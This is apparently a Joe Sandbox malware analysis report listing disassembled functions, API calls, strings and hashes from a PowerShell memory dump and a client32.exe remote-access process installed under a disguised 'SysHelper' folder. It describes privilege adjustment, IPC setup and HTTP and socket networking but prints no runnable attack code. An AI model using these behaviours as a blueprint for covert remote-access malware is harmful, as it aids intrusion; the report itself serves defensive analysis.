Function 0895375D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2043649528.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0d6fee54870ccc2425d8ff2f7459dd901ffbc30e6f33b7f1924c4f081269a8
Instruction ID: 2dc172d686b343409e27caaee0d21004cb85411a45a4c48d68986d172b0de2d3
Opcode Fuzzy Hash: 5e0d6fee54870ccc2425d8ff2f7459dd901ffbc30e6f33b7f1924c4f081269a8
Instruction Fuzzy Hash: 60B012A247C150FED240B6508E05FFB7F94D761703F404809F1C9E8091C050C141D731

Non-executed Functions

Function 079D2A28 Relevance: 11.7, Strings: 9, Instructions: 484COMMON

Download Yara Rule

Strings

tP^q, xrefs: 079D2E81
4'^q, xrefs: 079D2B26
4'^q, xrefs: 079D2B30
$^q, xrefs: 079D2E30
4'^q, xrefs: 079D2D25
$^q, xrefs: 079D2E0A
tP^q, xrefs: 079D2E75
4'^q, xrefs: 079D2D2F
$^q, xrefs: 079D2E3C

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-2378468523
Opcode ID: b61d76d2bda007df2ad636e773eadc4d8e4041a13c3e01a8d30d9e215e082c92
Instruction ID: a27968eb2c97b8040a849efd8fcd63279f91f7fd678c061f15ff6d108b159e9b
Opcode Fuzzy Hash: b61d76d2bda007df2ad636e773eadc4d8e4041a13c3e01a8d30d9e215e082c92
Instruction Fuzzy Hash: 14F135B27042568FC7158F78981066ABBAABFC6254B18C8ABD445CF362DB76CC45C3B1

Function 079D1BF0 Relevance: 6.5, Strings: 5, Instructions: 285COMMON

Download Yara Rule

Strings

tP^q, xrefs: 079D1DF1
$^q, xrefs: 079D1DAC
$^q, xrefs: 079D1DA0
tP^q, xrefs: 079D1DE5
$^q, xrefs: 079D1D7A

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-578306960
Opcode ID: 19c9583f214eafc10d0b86b736898ef23c29fc80f6b892bbdef88ced68f545b9
Instruction ID: 5ec7fc4bdf7a7679b8200a1da99f461eb51e52ad754c93569ae0bb7b4e3b3ad5
Opcode Fuzzy Hash: 19c9583f214eafc10d0b86b736898ef23c29fc80f6b892bbdef88ced68f545b9
Instruction Fuzzy Hash: 359176B3B4434D8FC7148B7D98046AABBEAEFC6214B2AC46BD545CB252CB31CC45C7A1

Function 079D8AD0 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079D8B7A
4'^q, xrefs: 079D8B86
$^q, xrefs: 079D8C57
$^q, xrefs: 079D8C82
$^q, xrefs: 079D8C8E

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 9ad07ed1a7b2a4bcfc59938b53f3f4ff333e3b81cda391ef22b52cbb3bffce4e
Instruction ID: 68a22eb7ddee7e46d106b4204c475002df43ddccdf2c90608cd2e99c78a7c073
Opcode Fuzzy Hash: 9ad07ed1a7b2a4bcfc59938b53f3f4ff333e3b81cda391ef22b52cbb3bffce4e
Instruction Fuzzy Hash: 2A5136F170434ADFCB245A799800B6ABBAAAFC5654F14C87BD445CB352DA39CC82C361

Function 079D41FC Relevance: 6.3, Strings: 5, Instructions: 86COMMON

Download Yara Rule

Strings

$^q, xrefs: 079D427F
tP^q, xrefs: 079D42C4
$^q, xrefs: 079D4260
$^q, xrefs: 079D4244
$^q, xrefs: 079D4228

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 8006ccd478dec67029b6518ea5f081f4ccc076051b2f36bd675aabb285bb4c02
Instruction ID: 318d2d732051a44cea4f2da9913105123e4b96ea4af79c8f2e22c82e67d65d4d
Opcode Fuzzy Hash: 8006ccd478dec67029b6518ea5f081f4ccc076051b2f36bd675aabb285bb4c02
Instruction Fuzzy Hash: 082137B5600396CFCB248F54C944969BBF8AF82624B19819AEE409F272E771DD48CB61

Function 079D51B0 Relevance: 5.3, Strings: 4, Instructions: 253COMMON

Download Yara Rule

Strings

$^q, xrefs: 079D525C
tP^q, xrefs: 079D529F
tP^q, xrefs: 079D5293
$^q, xrefs: 079D52F7

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q
API String ID: 0-263804196
Opcode ID: ef0f1f380fdd2e617f6303ed187b31c6122c811bfa46e1b79f048fc0bf488e16
Instruction ID: a155e4ee17240d18d62814e8bf95d6bece10acd0143c778de8d8c1d4435a4489
Opcode Fuzzy Hash: ef0f1f380fdd2e617f6303ed187b31c6122c811bfa46e1b79f048fc0bf488e16
Instruction Fuzzy Hash: E8817971B002049FC7249B698804BAEFBE6EFC5314F25C46AE909DF395CAB2DC55C7A1

Function 079DA968 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 079DA9D0
$^q, xrefs: 079DA996
$^q, xrefs: 079DA9C4
$^q, xrefs: 079DA97A

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 93dcf0a160b58111e70ed07e15d0504587745d5b4f678813aea1d4ea32dde33d
Instruction ID: 900d24a16133733a1a0f7d006c235e1d16bbaf91f2a646bf9deb5c045c1b0e10
Opcode Fuzzy Hash: 93dcf0a160b58111e70ed07e15d0504587745d5b4f678813aea1d4ea32dde33d
Instruction Fuzzy Hash: 4D2147B27043065BDB24197A9C00B2BB6DBDFC0718F24C82BA50ACB395DD79CC9583A1

Function 079D0308 Relevance: 5.0, Strings: 4, Instructions: 42COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079D037F
$^q, xrefs: 079D035E
4'^q, xrefs: 079D0373
$^q, xrefs: 079D0352

Memory Dump Source

Source File: 00000005.00000002.2040152577.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 424bc039ddab5c05694c6b4872652c7a29a4028992af53ca6dfbafe24867776e
Instruction ID: c351dad5afe04a499039d727fb44fa72b760ef3379a5ebcea674ad065081261f
Opcode Fuzzy Hash: 424bc039ddab5c05694c6b4872652c7a29a4028992af53ca6dfbafe24867776e
Instruction Fuzzy Hash: 60014960B483894FC32E5A2C48243546BB76FC2A44F2948ABC042CF36BCE949C4A8366

Analysis Process: client32.exePID: 8036, Parent PID: 7872COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	105

Executed Functions

Function 1109D4A0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,CF3D35D0,00080000,00000000,00000000), ref: 1109C77D
Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,CF3D35D0,00080000,00000000,00000000), ref: 1109D535
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
GetVersionExA.KERNEL32(?), ref: 1109D570
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
GetLastError.KERNEL32 ref: 1109D64D
LocalFree.KERNEL32(?), ref: 1109D676
LocalFree.KERNEL32(?), ref: 1109D683
GetLastError.KERNEL32 ref: 1109D6A0
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
LocalFree.KERNEL32(?), ref: 1109D6E9
LocalFree.KERNEL32(?), ref: 1109D6F6

Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8

Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
LocalFree.KERNEL32(?), ref: 1109D7EB
LocalFree.KERNEL32(?), ref: 1109D7F8
_memset.LIBCMT ref: 1109D810
GetTickCount.KERNEL32 ref: 1109D818
GetCurrentProcessId.KERNEL32 ref: 1109D8C4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
GetLastError.KERNEL32 ref: 1109D934
GetLastError.KERNEL32(00000000), ref: 1109D93B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
GetLastError.KERNEL32 ref: 1109D979
GetLastError.KERNEL32(00000000), ref: 1109D980
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
GetLastError.KERNEL32 ref: 1109D9BF
GetLastError.KERNEL32(00000000), ref: 1109D9C6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
GetLastError.KERNEL32 ref: 1109DA0A
GetLastError.KERNEL32(00000000), ref: 1109DA0D
LocalFree.KERNEL32(?), ref: 1109DA35
LocalFree.KERNEL32(?), ref: 1109DA42
GetCurrentThreadId.KERNEL32 ref: 1109DA73
CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
ResetEvent.KERNEL32(?), ref: 1109DABC
ResetEvent.KERNEL32(?), ref: 1109DAC2
ResetEvent.KERNEL32(?), ref: 1109DAC8
SetEvent.KERNEL32(?), ref: 1109DACE

Strings

cant create filemap, xrefs: 1109D685
Error creating filemap (%d), xrefs: 1109D654
SeSecurityPrivilege, xrefs: 1109D50A
map exists, xrefs: 1109D7FA
Error cant map view, xrefs: 1109D6CB
cant create events, xrefs: 1109DB04
S:(ML;;NW;;;LW), xrefs: 1109D598
Error cant create events, xrefs: 1109DAF7
cant map, xrefs: 1109D6F8
Info - reusing existing filemap, xrefs: 1109D789
cant create thread, xrefs: 1109DA9A
Cant create event %s, e=%d (x%x), xrefs: 1109D949, 1109D98E, 1109D9D4, 1109DA17
IPC(%s) created, xrefs: 1109DAD8
Error filemap exists, xrefs: 1109D7CD
warning map exists, xrefs: 1109D7A0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

Function 685A7030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406
threadlibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

LoadLibraryA.KERNEL32(WinInet.dll), ref: 685A7057
InitializeCriticalSection.KERNEL32(685DB898), ref: 685A70DF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A70EF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A7115
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A713B
WSAStartup.WSOCK32(00000101,685DB91A), ref: 685A7167
_malloc.LIBCMT ref: 685A71A3

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

_memset.LIBCMT ref: 685A71D3
_calloc.LIBCMT ref: 685A7214
_malloc.LIBCMT ref: 685A728B
_memset.LIBCMT ref: 685A72C1
_malloc.LIBCMT ref: 685A72CD
_memset.LIBCMT ref: 685A7303
GetTickCount.KERNEL32 ref: 685A7361
CreateThread.KERNEL32(00000000,00004000,685A6BA0,00000000,00000000,685DBACC), ref: 685A737E
SetThreadPriority.KERNEL32(00000000,00000001), ref: 685A73AC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\Support\,00000104), ref: 685A7430
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini), ref: 685A74B0
GetModuleHandleA.KERNEL32(nsmtrace), ref: 685A74C0
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 685A7566
timeBeginPeriod.WINMM(00000001), ref: 685A7573

Strings

HTCTL32, xrefs: 685A7036
_debug, xrefs: 685A7502, 685A7519, 685A753C, 685A754C
sv.subset.omit, xrefs: 685A72E8
NSM832428, xrefs: 685A7257
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A70FF, 685A7125, 685A714B, 685A71B9, 685A722A, 685A72A1, 685A72E3, 685A7392, 685A73BD
sv.hResponseEvent, xrefs: 685A712A
TraceFile, xrefs: 685A7537
sv.ResumeEvent, xrefs: 685A7150
C:\Users\user\AppData\Roaming\SysHelper\Support\, xrefs: 685A742A, 685A7438, 685A744C
WinInet.dll, xrefs: 685A7052
pci.ini, xrefs: 685A748F
*DisconnectTimeout, xrefs: 685A733A
TraceSend, xrefs: 685A74DB, 685A7514
C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini, xrefs: 685A7481, 685A749B
(iflags & CTL_REMOTE) == 0, xrefs: 685A73C2
sv.hRecvThreadReadyEvent, xrefs: 685A7104
Support\, xrefs: 685A7451
sv.hRecvThread, xrefs: 685A7397
NetworkSpeed, xrefs: 685A73D7
nsmtrace, xrefs: 685A74B6
sv.gateways, xrefs: 685A722F
609290, xrefs: 685A7242
TraceRecv, xrefs: 685A74CF, 685A74FD
mode, xrefs: 685A74A1
htctl.packet_tracing, xrefs: 685A74A8
General, xrefs: 685A733F
*CMPI, xrefs: 685A731F
sv.subset.subset, xrefs: 685A72A6
sv.s, xrefs: 685A71BE
Trace, xrefs: 685A7547

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$609290$C:\Users\user\AppData\Roaming\SysHelper\Support\$C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 3160247386-2125085888
Opcode ID: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
Instruction ID: bf6727e0cf09bfdcc17968a086c2d736e5d68eb3cb2f468a3d27a176817d2a7a
Opcode Fuzzy Hash: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
Instruction Fuzzy Hash: E3D1F6B5940305AFDB10AF688CC496E7BF9EB49348BC6442AFD59D7341E770AC408B9D

Function 11029230 Relevance: 84.5, APIs: 36, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,CF3D35D0,74DF23A0,?,00000000), ref: 11029265
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
SetLastError.KERNEL32(00000078), ref: 11029313
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
GetLastError.KERNEL32 ref: 11029372
_free.LIBCMT ref: 1102937E
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
SetLastError.KERNEL32(00000078), ref: 11029404
SetLastError.KERNEL32(00000078), ref: 11029411
SetLastError.KERNEL32(00000078), ref: 1102941B
_free.LIBCMT ref: 11029425

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
SetLastError.KERNEL32(00000078), ref: 110294BE
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
SetLastError.KERNEL32(00000078), ref: 11029523
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
SetLastError.KERNEL32(00000078), ref: 110297D0
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
SetLastError.KERNEL32(00000078), ref: 11029839
FreeLibrary.KERNEL32(?), ref: 1102984A

Strings

InternetQueryDataAvailable, xrefs: 110296FD
InternetErrorDlg, xrefs: 11029640
HttpOpenRequestA, xrefs: 11029543
GET, xrefs: 11029569
://, xrefs: 11029445
InternetOpenA, xrefs: 110293D5
InternetQueryOptionA, xrefs: 1102934B, 1102939B
InternetConnectA, xrefs: 110294CB
HttpSendRequestA, xrefs: 11029597
HttpQueryInfoA, xrefs: 110295E3
WinInet.dll, xrefs: 1102925D
InternetCloseHandle, xrefs: 110292F9, 1102949F, 11029504, 1102981C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$FreeInternetLibrary_free$ConnectHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 3391987931-913974648
Opcode ID: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
Opcode Fuzzy Hash: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

Function 6859A980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852

EnterCriticalSection.KERNEL32(685DB898,?,00000000,00000000), ref: 6859AA11
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA58
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA68
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA94
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6859AB0B
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB4E
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB5A
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB8E
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABB1
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABE3
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC18
WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC21
closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC29
htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC65
WSASetBlockingHook.WSOCK32(685963A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC76
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC8F
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC96
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC9C
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ACFD
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD04
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD0A
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD45
EnterCriticalSection.KERNEL32(685DB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD4F
InitializeCriticalSection.KERNEL32(-685DCB4A), ref: 6859ADE6

Part of subcall function 68598FB0: _memset.LIBCMT ref: 68598FE4
Part of subcall function 68598FB0: getsockname.WSOCK32(?,?,00000010,?,025A2E90,?), ref: 68599005

